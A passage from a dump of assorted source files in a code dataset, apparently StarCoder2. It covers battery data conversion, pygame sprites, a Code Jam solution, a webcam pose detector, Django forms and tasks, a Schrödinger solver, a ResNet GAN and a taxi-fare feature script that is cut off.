'Voltage_charge', 'Time', 'Capacity'],\n 'impedance': ['Sense_current', 'Battery_current', 'Current_ratio',\n 'Battery_impedance', 'Rectified_impedance', 'Re', 'Rct']\n }\n\n # Define one pd.DataFrame per cycle type\n df = {key: pd.DataFrame() for key in features_cols.keys()}\n\n # Get every cycle\n print(f'Number of cycles: {mat_db[0][0][0].shape[1]}')\n cycles = [[row.flat[0] for row in line] for line in mat_db[0][0][0][0]]\n\n # Get measures for every cycle\n for cycle_id, cycle_data in enumerate(cycles):\n tmp = pd.DataFrame()\n\n # Data series for every cycle\n features_x_cycle = cycle_data[-1]\n\n # Get features for the specific cycle type\n features = features_cols[cycle_data[0]]\n\n for feature, data in zip(features, features_x_cycle):\n if len(data[0]) > 1:\n # Correct number of records\n tmp[feature] = data[0]\n else:\n # Single value, so assign it to all rows\n tmp[feature] = data[0][0]\n\n # Add columns common to the cycle measurements\n tmp['id_cycle'] = cycle_id\n for k, col in enumerate(cycles_cols):\n tmp[col] = cycle_data[k]\n\n # Append cycle data to the right pd.DataFrame\n cycle_type = cycle_data[0]\n df[cycle_type] = df[cycle_type].append(tmp, ignore_index=True)\n\n return df\n\n\n\ndfs = to_df(mat_data)\ndfs_charge = dfs['charge']\ndfs_discharge = dfs['discharge']\ndfs_impedance = dfs['impedance']\n\ndfs_charge.to_csv(mat_data_folder + battery_idx + '_charge.csv', index=False)\ndfs_discharge.to_csv(mat_data_folder + battery_idx + '_discharge.csv', index=False)\ndfs_impedance.to_csv(mat_data_folder + battery_idx + '_impedance.csv', index=False)\n\n\n","sub_path":"tmp/mat_csv.py","file_name":"mat_csv.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"641063754","text":"import pygame\r\nfrom pygame.sprite import Sprite\r\n\r\nclass Bullet(Sprite):\r\n\t''' Класс дл управления пулями, выпущенными кoраблем '''\r\n\tdef __init__(self, ai_settings, screen, ship, fire_x):\r\n\t\t''' Coздает oбъект пули в текущей пoзиции кoрабля '''\r\n\t\t# Правильная реализации наследoвания (???)\r\n\t\tsuper().__init__()\r\n\t\tself.screen = screen\r\n\t\tself.ai_settings = ai_settings\r\n\t\t# Пoдгружаю изoбражение пули и пoлучаю прямoугoльник\r\n\t\tself.image = pygame.image.load('images/bullet.png')\r\n\t\tself.rect = self.image.get_rect()\r\n\t\t# Сoздаю нoвую пулю в месте распoлoжения кoрабля в данный мoмент\r\n\t\tself.rect.centerx = fire_x\r\n\t\tself.rect.top = ship.rect.top+1\r\n\t\t# Сoхраняю пoзицию пo Y пули в вещественнoм фoрмате\r\n\t\tself.y = float(self.rect.y)\r\n\t\t# Скoрoсть движения пули\r\n\t\tself.speed_factor = self.ai_settings.bullet_speed_factor\r\n\r\n\tdef update(self):\r\n\t\t''' Oбнoвление пoзиции пули на экране '''\r\n\t\tself.y -= self.speed_factor\r\n\t\t# Oбнoвление пoзиции прямoугoльника\r\n\t\tself.rect.y = self.y\r\n\r\n\tdef blitme(self):\r\n\t\t''' Рисую пулю в текущей пoзиции '''\r\n\t\tself.screen.blit(self.image, self.rect)","sub_path":"GAME/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"325736558","text":"t=int(input())\r\nfor i in range(t):\r\n\tn=int(input())\r\n\tdict={}\r\n\tp=0\r\n\ta=0\r\n\tc=1\r\n\tq=n\r\n\tif(n==0):\r\n\t\tprint(\"{0}{1}{2}{3}\".format('Case #',i+1,': ','INSOMNIA'))\r\n\t\tcontinue\r\n\telse:\r\n\t\twhile(True):\r\n\t\t\tb=q\r\n\t\t\twhile(b!=0):\r\n\t\t\t\ttemp=b%10\r\n\t\t\t\tif temp not in dict.keys():\r\n\t\t\t\t\tdict[temp]=''\r\n\t\t\t\t\tp+=1\r\n\t\t\t\t\tif(p==10):\r\n\t\t\t\t\t\tprint(\"{0}{1}{2}{3}\".format('Case #',i+1,': ',q))\r\n\t\t\t\t\t\ta=1\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tb=b//10\r\n\t\t\tif(a==1):\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tc+=1\r\n\t\t\t\tq=n*c\r\n\t\t\t\t\t\t\r\n\t\t\t\t\r\n\t\r\n\t\t\t\r\n","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_aman15jan_p1.py","file_name":"16_0_1_aman15jan_p1.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"112466198","text":"import random\nclass HashTable():\n\tdef __init__(self):\n\t\tself.data= ['None']*50\n\t\tself.addressList= []\n\t\tself.add = -1\n\n\tdef __str__(self):\n\t\treturn str(self.__dict__)\n\n\t# Python uses open addressing\n\tdef _hash(self):\n\t\tself.add +=1\n\t\treturn self.add\n\t\t# while True:\n\t\t# \tadd = random.randint(0,49)\n\t\t# \tif add not in self.addressList:\n\t\t# \t\treturn add\n\n\n\tdef set(self, keys, values):\n\t\taddress = self._hash()\n\t\tself.data[address] = [keys, values]\n\t\tself.addressList.append(address)\n\n\tdef get(self, keys):\n\t\tfor i in self.data:\n\t\t\tif i[0] == keys:\n\t\t\t\treturn i[1]\n\n\tdef keys(self):\n\t\tkey_list = []\n\t\tfor j in self.data:\n\t\t\tkey_list.append(j[0])\n\t\treturn key_list\n\n\nhas = HashTable()\nhas.set('Vignesh', 1996)\nhas.set('Hector', 300)\nhas.set('Ajith', 1976)\nhas.set('Ajay', 1975)\nprint(has.get('Ajith'))\nprint(has.keys())\nprint(has)","sub_path":"Hash Tables/Hash Tables.py","file_name":"Hash Tables.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"144075530","text":"import pygame\r\nfrom pygame.sprite import Sprite\r\n\r\nclass Bullet(Sprite):\r\n \"\"\"this class is usefull for making bullets.\"\"\"\r\n def __init__(self, tp_game):\r\n super().__init__()\r\n self.screen = tp_game.screen\r\n self.settings = tp_game.settings\r\n self.color = self.settings.bullet_color\r\n\r\n self.rect = pygame.Rect(0, 0, self.settings.bullet_width, self.settings.bullet_height)\r\n self.rect.midright = tp_game.ship.rect.midright\r\n\r\n self.x = float(self.rect.x)\r\n\r\n def update(self):\r\n \"\"\"this method useful for moving bullet horizontal.\"\"\"\r\n self.x += self.settings.bullet_speed\r\n\r\n self.rect.x = self.x\r\n\r\n def draw_bullet(self):\r\n \"\"\"deaw bullet on screen.\"\"\"\r\n pygame.draw.rect(self.screen, self.color, self.rect)\r\n\r\n","sub_path":"TargetPractice/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389029030","text":"import os\n\nimport cv2\nimport argparse\nimport chainer\nimport numpy as np\nimport timeit\nimport time\n\nfrom media_reader import VideoReader, get_filename_without_extension\nfrom pose_detector import PoseDetector, draw_person_pose\nfrom logging import basicConfig, getLogger, DEBUG\n\n#import cameras\n\nchainer.using_config('enable_backprop', False)\n\nif __name__ == '__main__':\n basicConfig(level=DEBUG)\n logger = getLogger(__name__)\n parser = argparse.ArgumentParser(description='Pose detector')\n #parser.add_argument('--video', type=str, default='', help='video file path')\n parser.add_argument('--gpu', '-g', type=int, default=-1, help='GPU ID (negative value indicates CPU)')\n args = parser.parse_args()\n\n #if args.video == '':\n #raise ValueError('Either --video has to be provided')\n\n chainer.config.enable_backprop = False\n chainer.config.train = False\n \n cap = cv2.VideoCapture(0)\n cap.set(3,640)\n cap.set(4,480)\n\n # load model\n pose_detector = PoseDetector(\"posenet\", \"models/coco_posenet.npz\", device=args.gpu)\n cnt = 0\n while True:\n\n \n ret, frame = cap.read()\n\n # algorithm starting point\n start_t = timeit.default_timer()\n \n if(cnt%3==0):\n poses, _ = pose_detector(frame)\n res_img = cv2.addWeighted(frame, 0.6, draw_person_pose(frame, poses), 0.4, 0)\n logger.debug(\"type: {}\".format(type(poses)))\n logger.debug(\"shape: {}\".format(poses.shape))\n logger.debug(poses)\n \n #algorithm terminating point\n terminate_t = timeit.default_timer()\n FPS = int(1./(terminate_t - start_t ))\n\n cv2.imshow('image',res_img)\n print(FPS)\n cnt = cnt + 1\n k = cv2.waitKey(30) & 0xff\n if k == 27: # Esc 키를 누르면 종료\n break\n \n ","sub_path":"RTPE.py","file_name":"RTPE.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"201176138","text":"import math\nimport pymssql\n\n\nclass LearningDB():\n\n def __init__(self):\n self.conn = pymssql.connect(host='127.0.0.1',\n user='sa',\n password='123456',\n database='PyLearningDB',\n charset='utf8')\n\n self.cursor = self.conn.cursor()\n self.sql = ''\n self.distance = 0.0\n self.conn.close()\n\n def learn_data(self, table, dim):\n '''\n 学习数据,将数据存到对应的数据库\n table指定哪个表,dim是维度数组\n '''\n\n learn_result = False\n\n try:\n if table < 0 or table > 9:\n raise Exception(\"错误!table的值为%d!\" % table)\n for num in dim:\n if num < 0:\n raise Exception(\"错误!dim的值不能小于0!\")\n\n self.conn = pymssql.connect(host='127.0.0.1',\n user='sa',\n password='123',\n database='PyLearningDB',\n charset='utf8')\n self.cursor = self.conn.cursor()\n self.sql = 'insert into table%d values(%d, %d, %d, %d, %d, %d, %d, %d, %d)' % (\n table, dim[0], dim[1], dim[2], dim[3], dim[4], dim[5], dim[6], dim[7], dim[8])\n self.cursor.execute(self.sql)\n self.conn.commit()\n learn_result = True\n except Exception as ex_learn:\n self.conn.rollback()\n raise ex_learn\n finally:\n self.conn.close()\n return learn_result\n\n def identify_data(self, test_data):\n '''\n 识别数据,将数据一一对比,返回最接近的近似值\n '''\n\n try:\n table_data = []\n for i in range(10):\n table_data.append(self.__get_data(i, test_data))\n\n # 返回table_data中最小值的索引\n return table_data.index(min(table_data))\n except Exception as ex_identify:\n raise ex_identify\n\n def __get_data(self, table, test_data):\n '''\n 取出table表中所有数据\n 并与测试数据进行比较,返回最小值\n 如果table表中无数据,则全部取0\n '''\n\n try:\n if table < 0 or table > 9:\n raise Exception(\"错误!table的值不能为%d!\" % table)\n self.conn = pymssql.connect(host='127.0.0.1',\n user='sa',\n password='123',\n database='PyLearningDB',\n charset='utf8')\n self.cursor = self.conn.cursor()\n self.sql = 'select * from table%d' % table\n self.cursor.execute(self.sql)\n receive_sql = self.cursor.fetchall()\n\n if not receive_sql:\n new_receive_sql = [(0, 0, 0, 0, 0, 0, 0, 0, 0)]\n else:\n new_receive_sql = receive_sql\n finally:\n self.conn.close()\n # 计算最小值\n dim_data = []\n for receive_data in new_receive_sql:\n dim_data.append(self.__distance_data(test_data, receive_data))\n # 返回dimData中最小值\n return min(dim_data)\n\n def __distance_data(self, test_data, table_data):\n '''\n 求九维空间中两点之间的距离\n '''\n\n self.distance = 0.0\n for i in range(9):\n self.distance += (test_data[i] - table_data[i]) ** 2\n return math.sqrt(self.distance)\n","sub_path":"StudyingDB.py","file_name":"StudyingDB.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"519442370","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom server import app\n\nlayout = html.Div([\n\n html.H1(children='Macro Dashboards',\n style= {\n 'textAlign': 'center',\n 'padding-top': '30px',\n 'color': '#0064ad',\n 'font-weight': 'bold'\n }),\n dcc.Link(children=\n html.Button('Sort by Data Type'),\n href='/datatype',\n style={\n 'display': 'flex',\n 'justify-content': 'center',\n 'margin-bottom': '30px',\n }),\n dcc.Link(children=\n html.Button('Choose Country'),\n href='/callback',\n style={\n 'display': 'flex',\n 'justify-content': 'center',\n 'margin-bottom': '30px',\n }),\n])","sub_path":"apps/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"41295125","text":"from config import celery_app\n\n# import django\nfrom django.conf import settings\nfrom django.template import Context\nfrom django.template import loader\nfrom django.core.mail import EmailMultiAlternatives\n\n# import project\nfrom accounts.models import User\n\n\n@celery_app.task\ndef send_email_alert_to_operator(template_url, subject, data={}):\n\n # send email alert about there is not at least one checking account and one credit account being linked\n emails = User.objects.filter(is_staff=True).values_list('email', flat=True)\n\n template = loader.get_template(template_url)\n context = Context(data)\n\n html_content = template.render(context)\n\n message = EmailMultiAlternatives(subject, '', settings.DEFAULT_FROM_EMAIL, emails)\n\n message.attach_alternative(html_content, \"text/html\")\n\n message.send()\n\n\n@celery_app.task\ndef send_email_alert_to_user(email, template_url, subject, context):\n # send email alert about there is not at least one checking account and one credit account being linked\n template = loader.get_template(template_url)\n\n html_content = template.render(context)\n\n message = EmailMultiAlternatives(subject, 'Email alert', settings.DEFAULT_FROM_EMAIL, [email])\n\n message.attach_alternative(html_content, \"text/html\")\n\n message.send()\n","sub_path":"debitize/debitize/commons/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"648690278","text":"from django import forms\nfrom django.forms.models import inlineformset_factory\n\nfrom .models import Contract, Payment\nfrom projects.models import Project\n\n\nclass ContractForm(forms.ModelForm):\n shoot_location_is_same_as_billing_address = forms.BooleanField(required=False)\n\n class Meta:\n model = Contract\n fields = ('client', 'shoot_location_is_same_as_billing_address', 'shoot_address',\n 'shoot_city', 'shoot_zip_code', 'contract_number', 'contract_date', 'total_cost', 'payment_options')\n\n def __init__(self, *args, **kwargs):\n super(ContractForm, self).__init__(*args, **kwargs)\n self.fields['client'].required = False\n\n def clean_contract_number(self):\n contract_number = self.cleaned_data.get('contract_number')\n client = self.cleaned_data.get('client')\n\n if client:\n # check if contract number already exists in country\n contract_number_exists = Contract.objects.filter(\n contract_number=contract_number,\n client__country=client.country\n ).exists()\n\n if contract_number_exists:\n raise forms.ValidationError(u\"Contract number already exists in country %(country_name)s\" %\n {'country_name': client.country.name}\n )\n\n return contract_number\n\n\nContractProjectsFormSet = inlineformset_factory(Contract, Project, fields=('product', 'notes'), extra=2,\n can_delete=False)\n\n\nclass UpdatePaymentForm(forms.ModelForm):\n class Meta:\n model = Payment\n fields = ('amount', 'reference', 'contract', 'inputter')\n widgets = {\n 'inputter': forms.HiddenInput(),\n 'contract': forms.HiddenInput()\n }\n\n\nclass UpdateContractForm(forms.ModelForm):\n\n class Meta:\n model = Contract\n fields = ('client', 'shoot_address',\n 'shoot_city', 'shoot_zip_code', 'contract_number', 'contract_date', 'total_cost', 'payment_options')\n\n def clean_contract_number(self):\n contract_number = self.cleaned_data.get('contract_number')\n client = self.cleaned_data.get(\"client\")\n if contract_number != self.instance.contract_number:\n # check if contract number already exists in country\n contract_number_exists = Contract.objects.filter(\n contract_number=contract_number,\n client__country=client.country\n ).exists()\n\n if contract_number_exists:\n raise forms.ValidationError(\n u\"Contract number already exists in country %(country_name)s\" %\n {'country_name': client.country.name}\n )\n\n return contract_number\n\n def __init__(self, *args, **kwargs):\n super(UpdateContractForm, self).__init__(*args, **kwargs)\n self.fields['contract_date'].widget.attrs['class'] = 'form-control'","sub_path":"tracktool/contracts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"46993968","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 27 10:30:03 2019\r\n\r\n@author: dboyce5\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy.linalg as la\r\nimport matplotlib.pyplot as plt\r\n#import scipy.special as sp\r\n\r\n#constants (in SI units)\r\nhbar = 1 #Planck's constant\r\nL = 10 #length of x grid\r\nsigma = 2\r\np = 2 * np.pi\r\nm = 1\r\n\r\nN = 200 #number of cells; there should be N + 2 points, though\r\n\r\n#boundary points\r\na = -L\r\nb = L\r\n\r\n#stepping constant\r\ntau = 0.01\r\n\r\n#x grid (cell-edge)\r\nx,h = np.linspace(a, b,N,retstep = True,dtype=np.complex_)\r\n\r\n#potential (zero inside well)\r\nV = np.zeros_like(x,dtype=np.complex_)\r\n\r\nPsi = np.zeros_like(x,dtype=np.complex_)\r\nPsi = np.exp(1j * p * x / hbar) * np.exp(-x**2 / (2 * sigma**2)) / (np.sqrt(sigma * np.sqrt(np.pi)))\r\n#%%\r\n#define A and B matrices\r\nA = np.identity(N,dtype=np.complex_)\r\nB = np.identity(N,dtype=np.complex_)\r\nA[0,0] = 1\r\nA[-1,-1] = 1\r\nB[0:] = 0\r\nB[-1:] = 0\r\nfor n in range(1,N - 1):\r\n A[n,n] = (1j * hbar / tau) - (hbar**2 / (2 * m * hbar**2)) - (V[n] / 2)\r\n B[n,n] = (1j * hbar / tau) + (hbar**2 / (2 * m * hbar**2)) + (V[n] / 2)\r\n A[n,n + 1] = hbar**2 / (4 * m * h**2)\r\n A[n,n - 1] = hbar**2 / (4 * m * h**2)\r\n B[n,n + 1] = -hbar**2 / (4 * m * h**2)\r\n B[n,n - 1] = -hbar**2 / (4 * m * h**2)\r\n \r\n \r\n#matrix multiplication to get the rhs \r\nr = B @ Psi\r\n\r\n# load r[1] and r[-1] as appropriate\r\n# for the boundary conditions\r\nr[0] = 0\r\nr[-1] = 0\r\n\r\n# load the new T directly into T itself\r\n\r\n\r\nk = 0\r\nt = 0\r\ntmax = 15\r\nplt.figure(1) # Open the figure window\r\n# the loop that steps the solution along\r\n\r\nwhile t < tmax:\r\n k = k + 1\r\n t = t + tau\r\n \r\n Psi = la.solve(A,r)\r\n PsiStar = np.conj(Psi)\r\n PsiSq = np.real(PsiStar * Psi)\r\n \r\n integral = np.trapz(PsiSq,x,h)\r\n \r\n #matrix multiplication to get the rhs \r\n r = B @ Psi\r\n\r\n # load r[1] and r[-1] as appropriate\r\n # for the boundary conditions\r\n r[0] = 0\r\n r[-1] = 0\r\n \r\n # Use leapfrog and the boundary conditions to load\r\n # ynew with y at the next time step using y and yold\r\n # update yold and y for next timestep\r\n # remember to use np.copy\r\n # make plots every 50 time steps\r\n \r\n #Texact = np.sin(np.pi * x / L) * np.exp(-np.pi**2 * D * t / L**2)\r\n \r\n #error = np.sqrt( np.mean( (T - Texact)**2 ))\r\n \r\n if k % 10 == 0:\r\n plt.clf() # clear the figure window\r\n #plt.plot(x,Texact,'b-')\r\n plt.plot(x,np.real(Psi),'b-')\r\n plt.plot(x,PsiSq,'r-')\r\n plt.xlabel('x')\r\n plt.ylabel('T')\r\n plt.title('time = {:1.3f}, area under |Psi|**2 = {:1.6f}'.format(t,integral))\r\n plt.ylim([-1,1])\r\n plt.xlim([-L,L])\r\n plt.draw() # Draw the plot\r\n plt.pause(0.1) # Give the computer time to draw\r\n\r\n","sub_path":"Lab 08 -- Schrödinger's Equation/src/Problem 8-2b.py","file_name":"Problem 8-2b.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"116592530","text":"from django.urls import path\nfrom . import views,views1,model_view,views_vinay\nfrom django.conf.urls import url\nurlpatterns = [\n url(r'^test', views.hello,name='test'),\n url(r'^show', views.show, name='show'),\n url(r'^index', views.index, name='index'),\n url(r'^api', views1.index, name='index'),\n url(r'^student', model_view.student_index, name='student_index'),\n url(r'^Mobile', model_view.mobile_index, name='mobile_index'),\n url(r'^vinayinfo', views_vinay.vinayinfo, name='vinayinfo'),\n url(r'^emp', model_view.emp, name='emp'),\n\n\n\n\n\n ]","sub_path":"djangoproject/djangoapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487025725","text":"import math\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport math\r\nimport numpy as np\r\n\r\n\r\ndef _upsample(x):\r\n h, w = x.shape[2:]\r\n return F.interpolate(x, size=(h * 2, w * 2))\r\n\r\n\r\ndef upsample_conv(x, conv):\r\n return conv(_upsample(x))\r\n\r\n\r\nclass genBlock(nn.Module):\r\n def __init__(self, in_channels, out_channels,\r\n activation=F.relu, hidden_channels=None, ksize=3, pad=1, upsample=False):\r\n super(genBlock, self).__init__()\r\n self.activation = activation\r\n self.upsample = upsample\r\n self.learnable_sc = in_channels != out_channels or upsample\r\n hidden_channels = out_channels if hidden_channels is None else hidden_channels\r\n self.c1 = nn.Conv2d(in_channels, hidden_channels, kernel_size=ksize, padding=pad)\r\n nn.init.xavier_uniform_(self.c1.weight.data, math.sqrt(2))\r\n self.c2 = nn.Conv2d(hidden_channels, out_channels, kernel_size=ksize, padding=pad)\r\n nn.init.xavier_uniform_(self.c2.weight.data, math.sqrt(2))\r\n self.b1 = nn.BatchNorm2d(in_channels)\r\n self.b2 = nn.BatchNorm2d(hidden_channels)\r\n if self.learnable_sc:\r\n self.c_sc = nn.Conv2d(in_channels, out_channels, kernel_size=1, padding=0)\r\n nn.init.xavier_uniform_(self.c_sc.weight.data)\r\n\r\n def residual(self, x):\r\n h = x\r\n h = self.b1(h)\r\n h = self.activation(h)\r\n h = upsample_conv(h, self.c1) if self.upsample else self.c1(h)\r\n h = self.b2(h)\r\n h = self.activation(h)\r\n h = self.c2(h)\r\n return h\r\n\r\n def shortcut(self, x):\r\n if self.learnable_sc:\r\n x = upsample_conv(x, self.c_sc) if self.upsample else self.c_sc(x)\r\n return x\r\n else:\r\n return x\r\n\r\n def forward(self, input):\r\n return self.residual(input) + self.shortcut(input)\r\n\r\n\r\nclass ResNetGenerator(nn.Module):\r\n def __init__(self, ch=256, dim_z=128, bottom_width=4, activation=F.relu, distribution=\"normal\"):\r\n super(ResNetGenerator, self).__init__()\r\n self.bottom_width = bottom_width\r\n self.activation = activation\r\n self.distribution = distribution\r\n self.dim_z = dim_z\r\n self.l1 = nn.Linear(dim_z, (bottom_width ** 2) * ch)\r\n nn.init.xavier_uniform_(self.l1.weight.data)\r\n self.block2 = genBlock(ch, ch, activation=activation, upsample=True)\r\n self.block3 = genBlock(ch, ch, activation=activation, upsample=True)\r\n self.block4 = genBlock(ch, ch, activation=activation, upsample=True)\r\n self.b5 = nn.BatchNorm2d(ch)\r\n self.c5 = nn.Conv2d(ch, 3, kernel_size=3, stride=1, padding=1)\r\n nn.init.xavier_uniform_(self.c5.weight.data)\r\n self.initial()\r\n\r\n def initial(self):\r\n def weights_init(m):\r\n classname = m.__class__.__name__\r\n if classname.find('Conv2d') != -1:\r\n nn.init.constant_(m.bias.data, 0)\r\n elif classname.find('Linear') != -1:\r\n nn.init.constant_(m.bias.data, 0)\r\n elif classname.find('BatchNorm') != -1:\r\n nn.init.normal_(m.weight.data, 1.0, 0.02)\r\n nn.init.constant_(m.bias.data, 0)\r\n\r\n self.apply(weights_init)\r\n\r\n def forward(self, input):\r\n h = input\r\n h0 = self.l1(h)\r\n h = h0.view(h0.size(0), -1, self.bottom_width, self.bottom_width)\r\n h = self.block2(h)\r\n h = self.block3(h)\r\n h = self.block4(h)\r\n h = self.b5(h)\r\n h = self.activation(h)\r\n h = torch.tanh(self.c5(h))\r\n return h\r\n\r\n\r\n# 自制ResNet50代码块,cifar10数据库Discriminator,z_dim=128\r\ndef _downsample(input):\r\n return F.avg_pool2d(input, 2)\r\n\r\n\r\nclass Dis_Bottleneck(nn.Module):\r\n # 前面1x1和3x3卷积的filter个数相等,最后1x1卷积是其expansion倍\r\n expansion = 4\r\n\r\n def __init__(self, in_channels, out_channels, downsample=False, stride=1):\r\n super(Dis_Bottleneck, self).__init__()\r\n self.downsample = downsample\r\n self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False)\r\n self.bn1 = nn.BatchNorm2d(out_channels)\r\n self.conv2 = nn.Conv2d(out_channels, out_channels, kernel_size=3,\r\n stride=stride, padding=1, bias=False)\r\n self.bn2 = nn.BatchNorm2d(out_channels)\r\n self.conv3 = nn.Conv2d(out_channels, self.expansion * out_channels,\r\n kernel_size=1, bias=False)\r\n self.bn3 = nn.BatchNorm2d(self.expansion * out_channels)\r\n\r\n self.shortcut = nn.Sequential()\r\n if stride != 1 or in_channels != self.expansion * out_channels:\r\n self.shortcut = nn.Sequential(\r\n nn.Conv2d(in_channels, self.expansion * out_channels,\r\n kernel_size=1, stride=stride, bias=False),\r\n nn.BatchNorm2d(self.expansion * out_channels)\r\n )\r\n\r\n def forward(self, x):\r\n out = F.relu(self.bn1(self.conv1(x)))\r\n out = F.relu(self.bn2(self.conv2(out)))\r\n out = self.bn3(self.conv3(out))\r\n out += self.shortcut(x)\r\n out = F.relu(out)\r\n if self.downsample:\r\n out = _downsample(out)\r\n return out\r\n\r\n\r\nclass ResNet_Discriminator(nn.Module):\r\n def __init__(self, block, num_blocks, ch=128):\r\n super(ResNet_Discriminator, self).__init__()\r\n self.ch = ch\r\n\r\n self.conv1 = nn.Conv2d(3, ch, kernel_size=3,\r\n stride=1, padding=1, bias=False)\r\n self.bn1 = nn.BatchNorm2d(ch)\r\n self.layer1 = self._make_layer(block, ch, num_blocks[0], downsample=True, stride=1)\r\n self.layer2 = self._make_layer(block, ch, num_blocks[1], downsample=False, stride=2)\r\n self.layer3 = self._make_layer(block, ch, num_blocks[2], downsample=False, stride=2)\r\n self.layer4 = self._make_layer(block, ch, num_blocks[3], downsample=False, stride=2)\r\n self.linear = nn.Linear(ch * block.expansion, 1)\r\n\r\n def _make_layer(self, block, out_channels, num_blocks, downsample, stride):\r\n strides = [stride] + [1] * (num_blocks - 1)\r\n layers = []\r\n for stride in strides:\r\n layers.append(block(self.ch, out_channels, downsample, stride))\r\n self.ch = out_channels * block.expansion\r\n return nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n out = F.relu(self.bn1(self.conv1(x)))\r\n out = self.layer1(out)\r\n out = self.layer2(out)\r\n out = self.layer3(out)\r\n out = self.layer4(out)\r\n out = torch.sum(out, dim=(2, 3))\r\n out = out.view(out.size(0), -1)\r\n out = self.linear(out)\r\n return out\r\n\r\n\r\ndef ResNetDiscriminator():\r\n return ResNet_Discriminator(Dis_Bottleneck, [3, 4, 6, 3])\r\n\r\n#\r\n# def test():\r\n# net = ResNetGenerator()\r\n# y = net(torch.randn(128, 128))\r\n# print(y)\r\n#\r\n#\r\n# #\r\n# #\r\n# test()\r\n# summary(ResNetGenerator(), (128, 128))\r\n","sub_path":"unsuccessful models/homemade_ResNet.py","file_name":"homemade_ResNet.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"80054160","text":"import os\r\nimport cv2 as cv\r\nimport time\r\n\r\ndef getdata():\r\n ff = open(\"test.txt\", \"w\")\r\n if not os.path.isdir(\"./image\"):\r\n os.mkdir(\"./image\")\r\n cap = cv.VideoCapture(0)\r\n cap.set(cv.CAP_PROP_FRAME_HEIGHT, 64), cap.set(cv.CAP_PROP_FRAME_HEIGHT, 48)\r\n i = 0\r\n while cap.isOpened():\r\n print(\"the number is {}\".format((i) % 10+1))\r\n time.sleep(1)\r\n ret, frame = cap.read()\r\n print(ret)\r\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n cv.imshow(\"frame\", gray)\r\n if cv.waitKey(0) == ord('c'):\r\n cv.imwrite('./image/{}.jpg'.format(i), gray)\r\n ff.writelines('./image/{}.jpg,{}\\n'.format(i, (i) % 10+1))\r\n i = i + 1\r\n else:\r\n break\r\n ff.close()\r\n cap.release()\r\n cv.destroyAllWindows()\r\n","sub_path":"capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"160222015","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom util import *\nfrom gbm import lgb_modelfit_nocv\n\ndatatypes = {\n 'key': 'str',\n 'fare_amount': 'float32',\n 'pickup_datetime': 'str',\n 'pickup_longitude': 'float32',\n 'pickup_latitude': 'float32',\n 'dropoff_longitude': 'float32',\n 'dropoff_latitude': 'float32',\n 'passenger_count': 'uint8'\n}\ntrain = pd.read_csv(\"./data/smallset4.csv\", dtype=datatypes)\n#test = pd.read_csv(\"./data/test.csv\", dtype=datatypes)\n\ntrain = clean_data(train)\n\ntrain = add_time_features(train)\n#test = add_time_features(test)\n\nadd_coordinate_features(train)\n#add_coordinate_features(test)\n\ntrain = add_distances_features(train)\n#test = add_distances_features(test)\n\nwanted_columns = [\n 'pickup_longitude',\n 'pickup_latitude',\n 'dropoff_longitude',\n 'dropoff_latitude',\n 'pickup_longitude_radian',\n 'pickup_latitude_radian',\n 'dropoff_longitude_radian',\n 'dropoff_latitude_radian',\n 'latdiff',\n 'londiff',\n 'euclidean',\n 'manhattan',\n 'sphere',\n 'bearing',\n 'downtown_pickup_distance',\n 'downtown_dropoff_distance',\n 'jfk_pickup_distance',\n 'jfk_dropoff_distance',\n 'ewr_pickup_distance',\n 'ewr_dropoff_distance',\n 'lgr_pickup_distance',\n 'lgr_dropoff_distance',\n 'downtown_pickup_distance_sphere',\n 'downtown_dropoff_distance_sphere',\n 'jfk_pickup_distance_sphere',\n 'jfk_dropoff_distance_sphere',\n 'ewr_pickup_distance_sphere',\n 'ewr_dropoff_distance_sphere',\n 'lgr_pickup_distance_sphere',\n 